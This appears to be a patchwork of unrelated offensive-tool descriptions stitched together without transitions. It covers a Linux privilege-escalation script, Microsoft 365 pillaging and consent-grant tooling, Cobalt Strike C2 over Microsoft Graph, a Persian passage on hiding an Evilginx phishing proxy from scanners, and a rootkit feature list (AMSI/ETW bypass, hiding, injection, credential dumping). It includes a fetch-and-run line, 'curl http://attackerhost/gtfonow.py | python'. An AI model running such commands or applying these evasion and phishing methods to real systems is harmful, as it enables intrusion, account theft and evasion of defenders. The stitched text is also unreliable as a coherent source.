Detection approach

There is no native way to list and interact with WFP. To do that we need to use the NtObjectManager module.

With the help of NtObjectManager we will be able to list all filters and the approach will be:

Create a list with the executables you want to check
Listed filters that block connections
Filter that list by the executables provided

Features

Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

It consists of three separate parts:

A PowerShell script where the majority of modules are located
An HTML GUI that can leverage an access token to navigate and pillage a user's account
A simple PHP redirector for harvesting authentication codes during an OAuth flow
Main Features

Search and export email
Search and export SharePoint and OneDrive files accessible to a user
Search all Teams chats and channels visible to the user and export full conversations
Deploy malicious apps
Discover misconfigured mailboxes that are exposed
Clone security groups to carry out watering hole attacks
Find groups that can be modified directly by your user or where membership rules can be abused to gain access
Search all user attributes for specific terms
Leverage a GUI built on the Graph API to pillage a user's account
Dump conditional access policies
Dump app registrations and external apps including consent and scope to identify potentially malicious apps
Tools to complete OAuth flow during consent grant attacks
GraphRunner doesn't rely on any third-party libraries or modules
Works with Windows and Linux
Continuously refresh your token package

GraphStrike supports almost all normal Cobalt Strike activities to include:

Use of Proxychains through a Cobalt Strike SOCKS proxy (though it is very slow...)
Upload/Download of large files
BOFs, execute-assembly, etc.
This also includes GraphStrike integration of the sleep, exit, and remove commands to match GraphStrike Server sleep times with Beacon as well as delete files in SharePoint when a Beacon is exited or removed.

GraphStrike additionally incorporates all of the features and functionality of the original AceLdr, with some additional API's made to utilize call stack spoofing as well.

در ابتدا، برای انجام این روش، نیاز به دو دامنه و سرور، و همچنین یک حساب Cloudflare داریم. Evilginx را روی Apache نصب کرده و از Let's Encrypt برای فعال سازی SSL استفاده می‌کنیم. سپس سایت را به Cloudflare اضافه می‌کنیم.

با فعال کردن ویژگی Temporary Protections و تنظیم شدت آن به حالت Under Attack ، می‌توانیم سایت خود را در برابر حملات مخرب محافظت کنیم. همچنین با فعال کردن ویژگی Geo-blocking، قادر خواهیم بود دسترسی ابزارهای اسکنر و scraper را قطع کنیم. همچنین، با فعال کردن ویژگی Botfight نیز می‌توانیم در برابر حملات رباتیکی که به سایت انجام می‌شوند، محافظت کنیم.

با استفاده از ویژگی Meta Refresh، دو دامنه را در اختیار داریم. یکی Evilginx و دیگری Apache. با استفاده از این روش، می‌توانیم در صورت بازدید از Evilginx، کاربر را به Apache منتقل کنیم و Meta Data را نشان دهیم. با این کار، اسکنر ها با Apache برخورد خواهند کرد.

و در نهایت، از Obfuscation برای مخفی‌سازی کدهای HTML و JS استفاده کنید تا خوانایی آن‌ها به سادگی امکان‌پذیر نباشد.

Current Features
Process hiding and unhiding
Process elevation
Process protection (anti-kill and dumping)
Bypass pe-sieve
Thread hiding and unhiding
Thread protection (anti-kill)
File protection (anti-deletion and overwriting)
Registry keys and values protection (anti-deletion and overwriting)
Registry keys and values hiding
Querying currently protected processes, threads, files, hidden ports, registry keys and values
Function patching
Built-in AMSI bypass
Built-in ETW patch
Process signature (PP/PPL) modification
Can be reflectively loaded
Shellcode Injection
APC
NtCreateThreadEx
DLL Injection
APC
NtCreateThreadEx
Querying kernel callbacks
ObCallbacks
Process and thread creation routines
Image loading routines
Registry callbacks
Removing and restoring kernel callbacks
ETWTI tampering
Module hiding
Driver hiding and unhiding
Credential Dumping
Port hiding/unhiding
Script execution
Initial operations